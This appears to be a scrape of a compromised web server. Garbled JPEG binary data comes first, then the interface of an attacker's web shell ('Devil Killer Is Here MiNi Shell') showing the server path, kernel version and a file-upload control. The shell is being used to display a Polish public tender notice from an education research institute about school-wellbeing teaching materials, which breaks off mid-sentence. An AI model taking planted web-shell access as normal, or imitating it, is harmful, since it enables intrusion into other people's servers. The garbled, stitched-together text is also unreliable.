JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250217/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250217/0010805001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przygotowanie materiałów metodycznych dot. dobrostanu szkolnego w ramach projektu „Wspieranie dostępności edukacji dla dzieci i młodzieży” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Instytut Badań Edukacyjnych - Państwowy Instytut Badawczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000178235</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Górczewska 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-180</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@ibe.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.ibe.edu.pl/index.php/zamowienia-publiczne</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przygotowanie materiałów metodycznych dot. dobrostanu szkolnego w ramach projektu „Wspieranie dostępności edukacji dla dzieci i młodzieży” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c69730d5-c1de-469d-bae4-2900e8ac925d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00108050</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Wspieranie dostępności edukacji dla dzieci i młodzieży”, współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Programu Fundusze Europejskie dla Rozwoju Społecznego 2021–2027 (FERS). Nr projektu: FERS.01.06-IP.05-0002/23. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c69730d5-c1de-469d-bae4-2900e8ac925d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">7.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin <br/>8.	Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>9.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. <br/>10.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. <br/>11.	Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. <br/>12.	W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania. <br/>13.	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej: <br/>a)	w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub <br/>b)	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”). <br/>14.	Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”. <br/>15.	Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>16.	W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny). <br/>Wszystkie wymagania określono w § 9 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dot. RODO została zawarta w załączniku nr 4 do SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna dot. RODO została zawarta w załączniku nr 4 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IBE PIB/7/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 188750 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na opracowaniu pakietów materiałów metodycznych przeznaczonych dla nauczycieli wychowania przedszkolnego, szkoły podstawowej oraz szkół ponadpodstawowych oraz pakiet informacyjny dla rodziców. <br/><br/>Zadaniem Wykonawcy będzie integracja treści przedmiotowych zapisanych w podstawie programowej z koncepcją dobrostanu szkolnego, jaka zostanie dostarczona przez Zamawiającego. Materiały o których mowa będą stanowić obudowę metodyczną do pracy nauczycieli z dziećmi/uczniami, a także będą zawierały materiały dla nauczycieli do autorefleksji w zakresie ich dobrostanu. Elementem zestawu będą również materiały dla rodziców, dzięki którym będą mogli lepiej zrozumieć czym jest dobrostan szkolny i w jaki sposób we współpracy z nauczycielami mogą wspierać swoje dzieci w tym zakresie. Zawarta w nich wiedza będzie również przydatna w ich własnym życiu. <br/><br/>Materiały metodyczne:<br/>odniosą się do koncepcji szkolnego dobrostanu uczniów dostarczonej przez Zamawiającego;<br/>będą zgodne ze szczegółowymi wytycznymi wskazanymi przez Zamawiającego;<br/>będą zgodne z aktualną wiedzą psychologiczno-pedagogiczną i z zakresu dydaktyki przedmiotowej.<br/><br/>Materiały metodyczne posłużą kadrom systemu oświaty do realizacji działań związanych z troską o dobrostan szkolny dzieci i uczniów na różnych etapach ich rozwoju.<br/>Zamawiający wyodrębnia cztery części zamówienia. Niniejsza część to:<br/>CZĘŚĆ PIERWSZA ZAMÓWIENIA -t.j. pakiety materiałów dydaktycznych dla: <br/>jeden pakiet - etap edukacji przedszkolnej (dzieci 4-6 lat) <br/>jeden pakiet - pierwszy etap edukacyjny (klasy I-III). <br/>Eksperci merytoryczni IBE będą współpracować z ekspertami zewnętrznymi w zakresie organizacyjnym i merytorycznym zgodnie z zasadami współpracy uregulowanymi w OPZ. Współpraca ta będzie obejmowała w szczególności: organizację spotkań, akceptację materiałów i efektów prac, monitorowanie postępów prac i zgłaszanie uwag. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 43000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">indywidualny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na opracowaniu pakietów materiałów metodycznych przeznaczonych dla nauczycieli wychowania przedszkolnego, szkoły podstawowej oraz szkół ponadpodstawowych oraz pakiet informacyjny dla rodziców. <br/><br/>Zadaniem Wykonawcy będzie integracja treści przedmiotowych zapisanych w podstawie programowej z koncepcją dobrostanu szkolnego, jaka zostanie dostarczona przez Zamawiającego. Materiały o których mowa będą stanowić obudowę metodyczną do pracy nauczycieli z dziećmi/uczniami, a także będą zawierały materiały dla nauczycieli do autorefleksji w zakresie ich dobrostanu. Elementem zestawu będą również materiały dla rodziców, dzięki którym będą mogli lepiej zrozumieć czym jest dobrostan szkolny i w jaki sposób we współpracy z nauczycielami mogą wspierać swoje dzieci w tym zakresie. Zawarta w nich wiedza będzie również przydatna w ich własnym życiu. <br/><br/>Materiały metodyczne:<br/>odniosą się do koncepcji szkolnego dobrostanu uczniów dostarczonej przez Zamawiającego;<br/>będą zgodne ze szczegółowymi wytycznymi wskazanymi przez Zamawiającego;<br/>będą zgodne z aktualną wiedzą psychologiczno-pedagogiczną i z zakresu dydaktyki przedmiotowej.<br/><br/>Materiały metodyczne posłużą kadrom systemu oświaty do realizacji działań związanych z troską o dobrostan szkolny dzieci i uczniów na różnych etapach ich rozwoju.<br/>Zamawiający wyodrębnia cztery części zamówienia, niniejsza część - CZĘŚĆ DRUGA ZAMÓWIENIA - t.j. jeden pakiet materiałów dydaktycznych dla drugiego etapu edukacyjnego (klasy IV - VIII). <br/>Eksperci merytoryczni IBE będą współpracować z ekspertami zewnętrznymi w zakresie organizacyjnym i merytorycznym zgodnie z zasadami współpracy uregulowanymi w OPZ. Współpraca ta będzie obejmowała w szczególności: organizację spotkań, akceptację materiałów i efektów prac, monitorowanie postępów prac i zgłaszanie uwag. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 43000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">indywidualny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na opracowaniu pakietów materiałów metodycznych przeznaczonych dla nauczycieli wychowania przedszkolnego, szkoły podstawowej oraz szkół ponadpodstawowych oraz pakiet informacyjny dla rodziców. <br/><br/>Zadaniem Wykonawcy będzie integracja treści przedmiotowych zapisanych w podstawie programowej z koncepcją dobrostanu szkolnego, jaka zostanie dostarczona przez Zamawiającego. Materiały o których mowa będą stanowić obudowę metodyczną do pracy nauczycieli z dziećmi/uczniami, a także będą zawierały materiały dla nauczycieli do autorefleksji w zakresie ich dobrostanu. Elementem zestawu będą również materiały dla rodziców, dzięki którym będą mogli lepiej zrozumieć czym jest dobrostan szkolny i w jaki sposób we współpracy z nauczycielami mogą wspierać swoje dzieci w tym zakresie. Zawarta w nich wiedza będzie również przydatna w ich własnym życiu. <br/><br/>Materiały metodyczne:<br/>odniosą się do koncepcji szkolnego dobrostanu uczniów dostarczonej przez Zamawiającego;<br/>będą zgodne ze szczegółowymi wytycznymi wskazanymi przez Zamawiającego;<br/>będą zgodne z aktualną wiedzą psychologiczno-pedagogiczną i z zakresu dydaktyki przedmiotowej.<br/><br/>Materiały metodyczne posłużą kadrom systemu oświaty do realizacji działań związanych z troską o dobrostan szkolny dzieci i uczniów na różnych etapach ich rozwoju.<br/>Zamawiający wyodrębnia cztery części zamówienia, niniejsza część obejmuje:<br/>CZĘŚĆ TRZECIA ZAMÓWIENIA - t.j. jeden pakiet materiałów dydaktycznych dla trzeciego etapu edukacyjnego (liceum ogólnokształcące, technikum, branżowa szkoła I stopnia, branżowa szkoła II stopnia). <br/>Eksperci merytoryczni IBE będą współpracować z ekspertami zewnętrznymi w zakresie organizacyjnym i merytorycznym zgodnie z zasadami współpracy uregulowanymi w OPZ. Współpraca ta będzie obejmowała w szczególności: organizację spotkań, akceptację materiałów i efektów prac, monitorowanie postępów prac i zgłaszanie uwag. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 43000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">indywidualny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na opracowaniu pakietów materiałów metodycznych przeznaczonych dla nauczycieli wychowania przedszkolnego, szkoły podstawowej oraz szkół ponadpodstawowych oraz pakiet informacyjny dla rodziców. <br/><br/>Zadaniem Wykonawcy będzie integracja treści przedmiotowych zapisanych w podstawie programowej z koncepcją dobrostanu szkolnego, jaka zostanie dostarczona przez Zamawiającego. Materiały o których mowa będą stanowić obudowę metodyczną do pracy nauczycieli z dziećmi/uczniami, a także będą zawierały materiały dla nauczycieli do autorefleksji w zakresie ich dobrostanu. Elementem zestawu będą również materiały dla rodziców, dzięki którym będą mogli lepiej zrozumieć czym jest dobrostan szkolny i w jaki sposób we współpracy z nauczycielami mogą wspierać swoje dzieci w tym zakresie. Zawarta w nich wiedza będzie również przydatna w ich własnym życiu. <br/><br/>Materiały metodyczne:<br/>odniosą się do koncepcji szkolnego dobrostanu uczniów dostarczonej przez Zamawiającego;<br/>będą zgodne ze szczegółowymi wytycznymi wskazanymi przez Zamawiającego;<br/>będą zgodne z aktualną wiedzą psychologiczno-pedagogiczną i z zakresu 